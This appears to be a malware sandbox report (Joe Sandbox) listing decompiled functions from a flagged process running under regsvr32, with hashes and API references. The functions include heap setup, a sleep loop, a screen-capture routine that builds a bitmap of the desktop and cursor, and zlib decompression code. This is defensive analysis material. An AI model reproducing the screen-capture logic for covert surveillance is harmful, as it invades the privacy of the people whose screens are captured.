            • Opcode ID: 139c207a68e47d77130d3865257a4003f4730408928f8cca7feb87ed1590e17b
            • Instruction ID: 8d3b4d605e9c195432ee3c0b6520a4a2c7ec394213efaaac11377bfcb0330c94
            • Opcode Fuzzy Hash: 139c207a68e47d77130d3865257a4003f4730408928f8cca7feb87ed1590e17b
            • Instruction Fuzzy Hash: 86B092322A40019BCB005BB8DC1A9A03BE0FF56706B98C2F4A006C6461C22EC4459B80
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00998DB4() {
            				void* _t1;
            
            				_t1 = HeapCreate(0, 0x96000, 0); // executed
            				 *0x9af9b8 = _t1;
            				return _t1;
            			}
            0x00998dbd
            0x00998dc3
            0x00998dc8

            APIs
            • HeapCreate.KERNELBASE(00000000,00096000,00000000,00996616), ref: 00998DBD
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CreateHeap
            • String ID:
            • API String ID: 10892065-0
            • Opcode ID: 5310c218fbdb4435e2ddadd5d63ee04c82fbafa3c9255576b1243241a19f733c
            • Instruction ID: 2357291fe190894ee31ab995e03bb12305df61d57e5fef07594bcec4ffc85b5b
            • Opcode Fuzzy Hash: 5310c218fbdb4435e2ddadd5d63ee04c82fbafa3c9255576b1243241a19f733c
            • Instruction Fuzzy Hash: 95B012706AD310A6DB500B605C4AB0135106B85B42F200011B609581D0C7B01000B555
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 91%
            			E0099DAF2(void* __ecx, intOrPtr _a4, signed int _a8) {
            				signed int _v8;
            				intOrPtr _v12;
            				signed int _t26;
            				signed int _t28;
            				signed int* _t36;
            				signed int* _t39;
            
            				_push(__ecx);
            				_push(__ecx);
            				_t36 = _a8;
            				_t28 = _t36[1];
            				if(_t28 != 0) {
            					_t39 = _t36[2];
            					do {
            						_a8 = _a8 & 0x00000000;
            						if(_t39[2] > 0) {
            							_t31 = _t39[3];
            							_t22 = _a4 + 0x24;
            							_v12 = _a4 + 0x24;
            							_v8 = _t39[3];
            							while(E0099A236(_t22,  *_t31) != 0) {
            								_t26 = _a8 + 1;
            								_t31 = _v8 + 4;
            								_a8 = _t26;
            								_t22 = _v12;
            								_v8 = _v8 + 4;
            								if(_t26 < _t39[2]) {
            									continue;
            								} else {
            								}
            								goto L8;
            							}
            							 *_t36 =  *_t36 |  *_t39;
            						}
            						L8:
            						_t39 =  &(_t39[4]);
            						_t28 = _t28 - 1;
            					} while (_t28 != 0);
            				}
            				Sleep(0xa);
            				return 1;
            			}
            0x0099daf5
            0x0099daf6
            0x0099daf9
            0x0099dafc
            0x0099db01
            0x0099db04
            0x0099db07
            0x0099db07
            0x0099db0f
            0x0099db14
            0x0099db17
            0x0099db1a
            0x0099db1d
            0x0099db20
            0x0099db33
            0x0099db34
            0x0099db37
            0x0099db3d
            0x0099db40
            0x0099db43
            0x00000000
            0x00000000
            0x0099db45
            0x00000000
            0x0099db43
            0x0099db49
            0x0099db49
            0x0099db4b
            0x0099db4b
            0x0099db4e
            0x0099db4e
            0x0099db53
            0x0099db5b
            0x0099db67

            APIs
            • Sleep.KERNELBASE(0000000A), ref: 0099DB5B
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Sleep
            • String ID:
            • API String ID: 3472027048-0
            • Opcode ID: c49848dfa43f467ec181333fc60d5a812df7b63941279ac27b13c7b62db94e77
            • Instruction ID: 5149f6a0f386df9a8ee2f254ccf7bbfd2637b71ed49ccc6902a5e187a7829560
            • Opcode Fuzzy Hash: c49848dfa43f467ec181333fc60d5a812df7b63941279ac27b13c7b62db94e77
            • Instruction Fuzzy Hash: 83111772A05205AFEF14CFA9C4C5AA9B7F8FF49324F118469E95A9B300D774E941CB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 98%
            			E00995D1E(int* __ecx) {
            				signed int _v8;
            				char _v12;
            				int _v16;
            				struct HWND__* _v20;
            				struct HWND__* _v24;
            				struct HDC__* _v28;
            				void* _v32;
            				int* _v36;
            				void* _v40;
            				void* _v44;
            				void* _v48;
            				void* _v52;
            				void* _v56;
            				intOrPtr _v60;
            				intOrPtr _v64;
            				intOrPtr _v68;
            				intOrPtr _v72;
            				intOrPtr _v76;
            				intOrPtr _v80;
            				short _v82;
            				short _v84;
            				signed int _v88;
            				signed int _v92;
            				struct tagBITMAPINFO _v96;
            				intOrPtr _v102;
            				int _v110;
            				char _v112;
            				void* _v116;
            				void* _v120;
            				void* _v124;
            				void* _v132;
            				void* _v136;
            				void* _v140;
            				int _v156;
            				signed int _v160;
            				void _v164;
            				int _t82;
            				void* _t84;
            				signed int _t92;
            				void* _t99;
            				char _t103;
            				intOrPtr _t113;
            				int* _t114;
            				struct HDC__* _t120;
            				signed int _t124;
            				short _t137;
            				struct HDC__* _t141;
            				void* _t144;
            				void* _t148;
            
            				_v36 = __ecx;
            				_v24 = 0;
            				_t120 = 0;
            				_v12 = 0;
            				_t144 = 0;
            				_v20 = 0;
            				_t141 = GetDC(0);
            				_v28 = _t141;
            				if(_t141 != 0) {
            					_t120 = CreateCompatibleDC(_t141);
            					if(_t120 != 0) {
            						_v8 = GetDeviceCaps(_t141, 8);
            						_t82 = GetDeviceCaps(_t141, 0xa);
            						_v16 = _t82;
            						_t144 = CreateCompatibleBitmap(_t141, _v8, _t82);
            						if(_t144 != 0) {
            							_t84 = SelectObject(_t120, _t144);
            							_v32 = _t84;
            							if(_t84 != 0) {
            								_t144 = SelectObject(_t120, _v32);
            								if(_t144 != 0) {
            									GetObjectW(_t144, 0x18,  &_v164);
            									_t92 = _v160;
            									_t124 = _v156;
            									_v92 = _t92;
            									_v84 = 1;
            									_t137 = 0x20;
            									_v82 = _t137;
            									_v96.bmiHeader = 0x28;
            									_v80 = 0;
            									_v76 = 0;
            									_v72 = 0;
            									_v68 = 0;
            									_v64 = 0;
            									_v60 = 0;
            									asm("cdq");
            									_v88 = _t124;
            									_v8 = ((_t92 << 5) + 0x1f >> 5) * _t124 << 2;
            									_t99 = E00998DC9(((_t92 << 5) + 0x1f >> 5) * _t124 << 2);
            									_v20 = _t99;
            									if(_t99 != 0) {
            										GetDIBits(_t120, _t144, 0, _v156, _t99,  &_v96, 0);
            										_v16 = _v8 + 0x36;
            										_t103 = E00998DC9(_v8 + 0x36);
            										_v12 = _t103;
            										if(_t103 != 0) {
            											_v110 = _v16;
            											_v112 = 0x4d42;
            											_v102 = 0x36;
            											E00998EA6(_t103,  &_v112, 0xe);
            											E00998EA6(_v12 + 0xe,  &_v96, 0x28);
            											E00998EA6(_v12 + 0x36, _v20, _v8);
            											_t148 = _t148 + 0x24;
            											_v8 = _v8 & 0x00000000;
            											_t113 = E0099FBFB(_v12, _v16,  &_v8);
            											_v24 = _t113;
            											if(_t113 != 0) {
            												_t114 = _v36;
            												if(_t114 != 0) {
            													 *_t114 = _v8;
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				E00998DDF( &_v20, 0);
            				E00998DDF( &_v12, 0);
            				if(_t120 != 0) {
            					DeleteDC(_t120);
            				}
            				if(_t141 != 0) {
            					DeleteDC(_t141);
            				}
            				if(_t144 != 0) {
            					DeleteObject(_t144);
            				}
            				return _v24;
            			}
            0x00995d2a
            0x00995d30
            0x00995d33
            0x00995d35
            0x00995d38
            0x00995d3a
            0x00995d43
            0x00995d45
            0x00995d4a
            0x00995d57
            0x00995d5b
            0x00995d6f
            0x00995d72
            0x00995d78
            0x00995d82
            0x00995d86
            0x00995d8e
            0x00995d94
            0x00995d99
            0x00995e2f
            0x00995e33
            0x00995e43
            0x00995e49
            0x00995e51
            0x00995e58
            0x00995e5b
            0x00995e64
            0x00995e65
            0x00995e6e
            0x00995e75
            0x00995e78
            0x00995e7b
            0x00995e7e
            0x00995e81
            0x00995e84
            0x00995e87
            0x00995e8b
            0x00995e9a
            0x00995e9d
            0x00995ea2
            0x00995ea8
            0x00995ebf
            0x00995ecc
            0x00995ecf
            0x00995ed4
            0x00995eda
            0x00995edf
            0x00995ee7
            0x00995ef2
            0x00995ef9
            0x00995f0e
            0x00995f23
            0x00995f31
            0x00995f34
            0x00995f39
            0x00995f3e
            0x00995f44
            0x00995f46
            0x00995f4b
            0x00995f50
            0x00995f50
            0x00995f4b
            0x00995f44
            0x00995eda
            0x00995ea8
            0x00995e33
            0x00995d99
            0x00995d86
            0x00995d5b
            0x00995f58
            0x00995f63
            0x00995f6d
            0x00995f70
            0x00995f70
            0x00995f78
            0x00995f7b
            0x00995f7b
            0x00995f83
            0x00995f86
            0x00995f86
            0x00995f93

            APIs
            • GetDC.USER32(00000000), ref: 00995D3D
            • CreateCompatibleDC.GDI32(00000000), ref: 00995D51
            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00995D6A
            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00995D72
            • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 00995D7C
            • SelectObject.GDI32(00000000,00000000), ref: 00995D8E
            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00995DB2
            • GetCursorInfo.USER32(?), ref: 00995DC3
            • CopyIcon.USER32 ref: 00995DD8
            • GetIconInfo.USER32(00000000,?), ref: 00995DE6
            • GetObjectW.GDI32(?,00000018,?), ref: 00995E04
            • DrawIconEx.USER32 ref: 00995E1C
            • SelectObject.GDI32(00000000,?), ref: 00995E29
            • GetObjectW.GDI32(00000000,00000018,?), ref: 00995E43
            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000028,00000000), ref: 00995EBF
            • DeleteDC.GDI32(00000000), ref: 00995F70
            • DeleteDC.GDI32(00000000), ref: 00995F7B
            • DeleteObject.GDI32(00000000), ref: 00995F86
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Object$DeleteIcon$CapsCompatibleCreateDeviceInfoSelect$BitmapBitsCopyCursorDraw
            • String ID: ($6
            • API String ID: 192358524-4149066357
            • Opcode ID: 0d7c5e038daf02b0188c980b2174fed20b593831f902343cf459e1f8220cc6f1
            • Instruction ID: cdb4e6b06bd8942bc7e5e4e6c6f68bf42cd537d46f860917b6d8f1b5d74783a2
            • Opcode Fuzzy Hash: 0d7c5e038daf02b0188c980b2174fed20b593831f902343cf459e1f8220cc6f1
            • Instruction Fuzzy Hash: 35811AB1D00619ABDF21DBA9DC49BAEBBB8FF49310F154069E505F7250EB309A05DB60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 81%
            			E009A676F(void* __edi) {
            				signed int _t164;
            				unsigned int _t172;
            				unsigned int _t173;
            				signed int _t174;
            				signed int _t176;
            				signed int _t178;
            				signed int _t179;
            				signed int _t182;
            				signed int _t184;
            				unsigned int _t185;
            				int _t186;
            				int _t194;
            				signed char _t200;
            				signed int _t207;
            				signed int _t208;
            				signed int _t209;
            				int _t210;
            				int _t222;
            				signed int _t227;
            				signed int _t235;
            				signed int _t251;
            				signed char _t252;
            				unsigned int _t253;
            				signed char _t254;
            				signed int* _t255;
            				signed int _t258;
            				signed int _t259;
            				signed int _t260;
            				signed int _t266;
            				intOrPtr _t271;
            				signed char _t278;
            				signed int _t279;
            				char* _t280;
            				signed int _t282;
            				signed char _t284;
            				signed int _t287;
            				signed int _t291;
            				int _t292;
            				int _t293;
            				int _t296;
            				int _t298;
            				int _t302;
            				signed int _t305;
            				signed char _t311;
            				signed char _t312;
            				signed char _t315;
            				signed char _t316;
            				signed int _t318;
            				int _t319;
            				int _t320;
            				signed char _t322;
            				int _t324;
            				int _t326;
            				int _t330;
            				signed int _t333;
            				signed char _t336;
            				signed char _t337;
            				signed char _t339;
            				int _t341;
            				signed int _t347;
            				int _t349;
            				intOrPtr _t350;
            				intOrPtr _t351;
            				unsigned int _t356;
            				unsigned int _t361;
            				signed int _t364;
            				signed int _t365;
            				intOrPtr _t367;
            				void* _t368;
            				intOrPtr* _t380;
            				void* _t381;
            				intOrPtr* _t389;
            				void* _t390;
            				signed int _t395;
            				void* _t396;
            				signed int _t397;
            				void* _t403;
            				void* _t405;
            				intOrPtr* _t412;
            				void* _t413;
            				signed int _t414;
            				void* _t416;
            				intOrPtr* _t423;
            				void* _t424;
            				unsigned int _t430;
            				signed int _t431;
            				void* _t434;
            				signed int* _t435;
            				void* _t439;
            
            				 *((intOrPtr*)(__edi + 0x56))();
            				asm("pushfd");
            				_t435 = _t434 - 0x40;
            				asm("cld");
            				_t395 = _t435[0x16];
            				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
            				_t164 =  *_t395;
            				_t435[0xb] = _t164;
            				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
            				_t271 =  *((intOrPtr*)(_t395 + 0x10));
            				_t251 =  *(_t395 + 0xc);
            				_t435[0xf] = _t251;
            				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
            				_t435[4] = _t271 - 0x101 + _t251;
            				_t435[2] =  *(_t367 + 0x4c);
            				_t435[3] =  *(_t367 + 0x50);
            				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
            				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
            				_t172 =  *(_t367 + 0x28);
            				_t347 =  *(_t367 + 0x34);
            				_t435[0xd] = _t172;
            				_t435[0xc] =  *(_t367 + 0x30);
            				_t435[0xe] = _t347;
            				_t430 =  *(_t367 + 0x38);
            				_t252 =  *(_t367 + 0x3c);
            				_t396 = _t435[0xb];
            				_t278 = _t435[5];
            				if(_t278 > _t396) {
            					L2:
            					if((_t396 & 0x00000003) != 0) {
            						_t396 = _t396 + 1;
            						_t278 = _t252;
            						_t252 = _t252 + 8;
            						_t172 = 0 << _t278;
            						_t430 = _t430 | _t172;
            						goto L2;
            					}
            					goto L4;
            				} else {
            					_t341 = _t278 + 0xb - _t396;
            					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
            					_t435 =  &(_t435[6]);
            					_t278 = 0;
            					_t396 =  &(_t435[7]);
            					_t435[5] = _t396;
            					L4:
            					_t368 = _t435[0xf];
            					while(1) {
            						_t439 =  *0x9ae040 - 2;
            						if(_t439 == 0) {
            							break;
            						}
            						if(_t439 > 0) {
            							do {
            								if(_t252 <= 0xf) {
            									asm("lodsw");
            									_t322 = _t252;
            									_t252 = _t252 + 0x10;
            									_t430 = _t431 | 0 << _t322;
            								}
            								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
            								while(1) {
            									_t253 = _t252 - _t173;
            									_t431 = _t430 >> _t173;
            									if(_t173 == 0) {
            										asm("stosb");
            										goto L22;
            									}
            									_t356 = _t173 >> 0x10;
            									_t311 = _t173;
            									if((_t173 & 0x00000010) == 0) {
            										if((_t173 & 0x00000040) != 0) {
            											L97:
            											if((_t173 & 0x00000020) == 0) {
												_t280 = "invalid literal/length code"; // zlib inflate_fast() error string (see the String ID line below); stored into strm->msg at L101
            												_t350 = 0x1a;
            											} else {
            												_t280 = 0;
            												_t350 = 0xb;
            											}
            											L101:
											_t174 = _t435[0x16]; // z_stream* strm
											if(_t280 != 0) {
												 *(_t174 + 0x18) = _t280; // strm->msg = error string
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350; // strm->state->mode = 0x1a (BAD) on error, 0xb (TYPE) on end-of-block
            											goto L104;
            										}
            										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
            										continue;
            									}
            									_t312 = _t311 & 0x0000000f;
            									if(_t312 != 0) {
            										if(_t253 < _t312) {
            											asm("lodsw");
            											_t339 = _t253;
            											_t253 = _t253 + 0x10;
            											_t431 = _t431 | 0 << _t339;
            											_t312 = _t339;
            										}
            										_t253 = _t253 - _t312;
            										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
            										_t431 = _t431 >> _t312;
            										_t356 = _t356 + _t235;
            									}
            									_t435[6] = _t356;
            									if(_t253 <= 0xf) {
            										asm("lodsw");
            										_t337 = _t253;
            										_t253 = _t253 + 0x10;
            										_t431 = _t431 | 0 << _t337;
            									}
            									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
            									while(1) {
            										_t361 = _t200 >> 0x10;
            										_t253 = _t253 - _t200;
            										_t431 = _t431 >> _t200;
            										_t315 = _t200;
            										if((_t200 & 0x00000010) != 0) {
            											break;
            										}
            										if((_t200 & 0x00000040) != 0) {
            											L96:
											_t280 = "invalid distance code"; // zlib inflate_fast() error string
            											_t350 = 0x1a;
            											goto L101;
            										}
            										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
            									}
            									_t316 = _t315 & 0x0000000f;
            									if(_t316 == 0) {
            										if(_t361 != 1 || _t435[0xa] == _t368) {
            											L38:
            											_t435[0xb] = _t396;
            											_t207 = _t368 - _t435[0xa];
            											if(_t207 < _t361) {
            												_t208 = _t435[0xd];
            												_t318 =  ~_t207;
            												_t414 = _t435[0xe];
            												if(_t208 < _t361) {
            													L100:
            													_t396 = _t435[0xb];
													_t280 = "invalid distance too far back"; // zlib inflate_fast() error string
            													_t350 = 0x1a;
            													goto L101;
            												}
            												_t319 = _t318 + _t361;
            												if(_t435[0xc] != 0) {
            													_t209 = _t435[0xc];
            													if(_t319 <= _t209) {
            														_t416 = _t414 + _t209 - _t319;
            														_t210 = _t435[6];
            														if(_t210 > _t319) {
            															_t210 = memcpy(_t368, _t416, _t319);
            															_t435 =  &(_t435[3]);
            															_t368 = _t416 + _t319 + _t319;
            															_t416 = _t368 - _t361;
            														}
            													} else {
            														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
            														_t324 = _t319 - _t209;
            														_t210 = _t435[6];
            														if(_t210 > _t324) {
            															_t210 = memcpy(_t368, _t416, _t324);
            															_t435 =  &(_t435[3]);
            															_t368 = _t416 + _t324 + _t324;
            															_t416 = _t435[0xe];
            															_t326 = _t435[0xc];
            															if(_t210 > _t326) {
            																_t210 = memcpy(_t368, _t416, _t326);
            																_t435 =  &(_t435[3]);
            																_t368 = _t416 + _t326 + _t326;
            																_t416 = _t368 - _t361;
            															}
            														}
            													}
            												} else {
            													_t416 = _t414 + _t208 - _t319;
            													_t210 = _t435[6];
            													if(_t210 > _t319) {
            														_t210 = memcpy(_t368, _t416, _t319);
            														_t435 =  &(_t435[3]);
            														_t368 = _t416 + _t319 + _t319;
            														_t416 = _t368 - _t361;
            													}
            												}
            												_t320 = _t210;
            												memcpy(_t368, _t416, _t320);
            												_t435 =  &(_t435[3]);
            												_t368 = _t416 + _t320 + _t320;
            												_t396 = _t435[0xb];
            												goto L22;
            											}
            											_t423 = _t368 - _t361;
            											_t330 = _t435[6] - 3;
            											 *_t368 =  *_t423;
            											_t424 = _t423 + 3;
            											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
            											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
            											memcpy(_t368 + 3, _t424, _t330);
            											_t435 =  &(_t435[3]);
            											_t368 = _t424 + _t330 + _t330;
            											_t396 = _t435[0xb];
            										} else {
            											_t389 = _t368 - 1;
            											_t222 =  *_t389;
            											_t333 = _t435[6] - 3;
            											 *(_t389 + 1) = _t222;
            											 *(_t389 + 2) = _t222;
            											 *(_t389 + 3) = _t222;
            											_t390 = _t389 + 4;
            											memset(_t390, _t222, _t333 << 0);
            											_t435 =  &(_t435[3]);
            											_t368 = _t390 + _t333;
            										}
            										goto L22;
            									}
            									if(_t253 < _t316) {
            										asm("lodsw");
            										_t336 = _t253;
            										_t253 = _t253 + 0x10;
            										_t431 = _t431 | 0 << _t336;
            										_t316 = _t336;
            									}
            									_t253 = _t253 - _t316;
            									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
            									_t431 = _t431 >> _t316;
            									_t361 = _t361 + _t227;
            									goto L38;
            								}
            								L22:
            							} while (_t435[4] > _t368 && _t435[5] > _t396);
            							L104:
            							if( *0x9ae040 == 2) {
            								_t253 = _t431;
            							}
            							_t176 = _t435[0x16];
            							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
            							_t282 = _t253 >> 3;
            							_t397 = _t396 - _t282;
            							_t254 = _t253 - (_t282 << 3);
            							 *(_t176 + 0xc) = _t368;
            							 *(_t351 + 0x3c) = _t254;
            							_t284 = _t254;
            							_t255 =  &(_t435[7]);
            							if(_t435[5] == _t255) {
            								_t266 =  *_t176;
            								_t435[5] = _t266;
            								_t397 = _t397 - _t255 + _t266;
            								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
            							}
            							 *_t176 = _t397;
            							_t258 = (1 << _t284) - 1;
            							if( *0x9ae040 == 2) {
            								asm("psrlq mm0, mm1");
            								asm("movd ebp, mm0");
            								asm("emms");
            							}
            							 *(_t351 + 0x38) = _t431 & _t258;
            							_t259 = _t435[5];
            							if(_t259 <= _t397) {
            								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
            							} else {
            								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
            							}
            							_t260 = _t435[4];
            							if(_t260 <= _t368) {
            								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
            							} else {
            								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
            							}
            							asm("popfd");
            							return _t176;
            						}
						_push(_t172);
						_push(_t252);
						_push(_t278);
						_push(_t347);
						asm("pushfd"); // CPUID-support probe: flip EFLAGS.ID (bit 21) and check whether the change sticks
						 *_t435 =  *_t435 ^ 0x00200000;
						asm("popfd");
						asm("pushfd");
						_pop(_t364);
						_t365 = _t364 ^  *_t435;
						if(_t365 == 0) {
							L15:
							 *0x9ae040 = 3; // no CPUID, or not an Intel family-6 CPU with MMX: select the scalar loop
							L16:
							_pop(_t347);
							_pop(_t278);
							_pop(_t252);
							_pop(_t172);
							continue;
						}
						asm("cpuid"); // leaf 0: EBX/EDX/ECX hold the vendor string "Genu" / "ineI" / "ntel" as little-endian dwords
						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
							goto L15;
						} else {
							asm("cpuid"); // leaf 1: the decompiler rendered the family compare (EAX bits 8..11 == 6) as the constant test "0xd != 6"; EDX bit 23 is the MMX feature flag
							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
								goto L15;
							} else {
								 *0x9ae040 = 2; // Intel family-6 CPU with MMX: select the MMX loop. This probe only picks zlib's code path; it is part of the statically linked inflate_fast(), not a sandbox or VM check
								goto L16;
							}
						}
            					}
            					asm("emms");
            					asm("movd mm0, ebp");
            					_t431 = _t252;
            					asm("movd mm4, dword [esp]");
            					asm("movq mm3, mm4");
            					asm("movd mm5, dword [esp+0x4]");
            					asm("movq mm2, mm5");
            					asm("pxor mm1, mm1");
            					_t253 = _t435[2];
            					do {
            						asm("psrlq mm0, mm1");
            						if(_t431 <= 0x20) {
            							asm("movd mm6, ebp");
            							asm("movd mm7, dword [esi]");
            							_t396 = _t396 + 4;
            							asm("psllq mm7, mm6");
            							_t431 = _t431 + 0x20;
            							asm("por mm0, mm7");
            						}
            						asm("pand mm4, mm0");
            						asm("movd eax, mm4");
            						asm("movq mm4, mm3");
            						_t173 =  *(_t253 + _t172 * 4);
            						while(1) {
            							_t279 = _t173 & 0x000000ff;
            							asm("movd mm1, ecx");
            							_t431 = _t431 - _t279;
            							if(_t173 == 0) {
            								break;
            							}
            							_t349 = _t173 >> 0x10;
            							if((_t173 & 0x00000010) == 0) {
            								if((_t173 & 0x00000040) != 0) {
            									goto L97;
            								}
            								asm("psrlq mm0, mm1");
            								asm("movd ecx, mm0");
            								_t173 =  *(_t253 + ((_t279 &  *(0x9a66ec + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
            								continue;
            							}
            							_t178 = _t173 & 0x0000000f;
            							if(_t178 != 0) {
            								asm("psrlq mm0, mm1");
            								asm("movd mm1, eax");
            								asm("movd ecx, mm0");
            								_t431 = _t431 - _t178;
            								_t349 = _t349 + (_t279 &  *(0x9a66ec + _t178 * 4));
            							}
            							asm("psrlq mm0, mm1");
            							if(_t431 <= 0x20) {
            								asm("movd mm6, ebp");
            								asm("movd mm7, dword [esi]");
            								_t396 = _t396 + 4;
            								asm("psllq mm7, mm6");
            								_t431 = _t431 + 0x20;
            								asm("por mm0, mm7");
            							}
            							asm("pand mm5, mm0");
            							asm("movd eax, mm5");
            							asm("movq mm5, mm2");
            							_t179 =  *(_t435[3] + _t178 * 4);
            							while(1) {
            								_t287 = _t179 & 0x000000ff;
            								_t253 = _t179 >> 0x10;
            								_t431 = _t431 - _t287;
            								asm("movd mm1, ecx");
            								if((_t179 & 0x00000010) != 0) {
            									break;
            								}
            								if((_t179 & 0x00000040) != 0) {
            									goto L96;
            								}
            								asm("psrlq mm0, mm1");
            								asm("movd ecx, mm0");
            								_t179 =  *(_t435[3] + ((_t287 &  *(0x9a66ec + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
            							}
            							_t182 = _t179 & 0x0000000f;
            							if(_t182 == 0) {
            								if(_t253 != 1 || _t435[0xa] == _t368) {
            									L76:
            									_t435[0xb] = _t396;
            									_t184 = _t368 - _t435[0xa];
            									if(_t184 < _t253) {
            										_t185 = _t435[0xd];
            										_t291 =  ~_t184;
            										_t403 = _t435[0xe];
            										if(_t185 < _t253) {
            											goto L100;
            										}
            										_t292 = _t291 + _t253;
            										if(_t435[0xc] != 0) {
            											_t186 = _t435[0xc];
            											if(_t292 <= _t186) {
            												_t405 = _t403 + _t186 - _t292;
            												if(_t349 > _t292) {
            													_t349 = _t349 - _t292;
            													memcpy(_t368, _t405, _t292);
            													_t435 =  &(_t435[3]);
            													_t368 = _t405 + _t292 + _t292;
            													_t405 = _t368 - _t253;
            												}
            											} else {
            												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
            												_t296 = _t292 - _t186;
            												if(_t349 > _t296) {
            													_t349 = _t349 - _t296;
            													memcpy(_t368, _t405, _t296);
            													_t435 =  &(_t435[3]);
            													_t368 = _t405 + _t296 + _t296;
            													_t405 = _t435[0xe];
            													_t298 = _t435[0xc];
            													if(_t349 > _t298) {
            														_t349 = _t349 - _t298;
            														memcpy(_t368, _t405, _t298);
            														_t435 =  &(_t435[3]);
            														_t368 = _t405 + _t298 + _t298;
            														_t405 = _t368 - _t253;
            													}
            												}
            											}
            										} else {
            											_t405 = _t403 + _t185 - _t292;
            											if(_t349 > _t292) {
            												_t349 = _t349 - _t292;
            												memcpy(_t368, _t405, _t292);
            												_t435 =  &(_t435[3]);
            												_t368 = _t405 + _t292 + _t292;
            												_t405 = _t368 - _t253;
            											}
            										}
            										_t293 = _t349;
            										_t172 = memcpy(_t368, _t405, _t293);
            										_t435 =  &(_t435[3]);
            										_t368 = _t405 + _t293 + _t293;
            										_t396 = _t435[0xb];
            										_t253 = _t435[2];
            										goto L64;
            									}
            									_t412 = _t368 - _t253;
            									_t302 = _t349 - 3;
            									 *_t368 =  *_t412;
            									_t413 = _t412 + 3;
            									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
            									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
            									_t172 = memcpy(_t368 + 3, _t413, _t302);
            									_t435 =  &(_t435[3]);
            									_t368 = _t413 + _t302 + _t302;
            									_t396 = _t435[0xb];
            									_t253 = _t435[2];
            									goto L64;
            								} else {
            									_t380 = _t368 - 1;
            									_t194 =  *_t380;
            									_t305 = _t349 - 3;
            									 *(_t380 + 1) = _t194;
            									 *(_t380 + 2) = _t194;
            									 *(_t380 + 3) = _t194;
            									_t381 = _t380 + 4;
            									_t172 = memset(_t381, _t194, _t305 << 0);
            									_t435 =  &(_t435[3]);
            									_t368 = _t381 + _t305;
            									_t253 = _t435[2];
            									L64:
            									if(_t435[4] <= _t368) {
            										goto L104;
            									}
            									goto L65;
            								}
            							}
            							asm("psrlq mm0, mm1");
            							asm("movd mm1, eax");
            							asm("movd ecx, mm0");
            							_t431 = _t431 - _t182;
            							_t253 = _t253 + (_t287 &  *(0x9a66ec + _t182 * 4));
            							goto L76;
            						}
            						_t172 = _t173 >> 0x10;
            						asm("stosb");
            						goto L64;
            						L65:
            					} while (_t435[5] > _t396);
            					goto L104;
            				}
			}

            • Instruction addresses: 0x009a676f to 0x009a6e02 (the per-line address column was flattened by extraction and is omitted)

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
            • API String ID: 0-3089872807
            • Opcode ID: 6a27a5da892aacde48c403040a706c543587054b0fd14b22174bbe56452f1893
            • Instruction ID: 4a899ee0a99f424ea128c5c6f8cf3f51a2785f9298887ea82def428c131afb1a
            • Opcode Fuzzy Hash: 6a27a5da892aacde48c403040a706c543587054b0fd14b22174bbe56452f1893
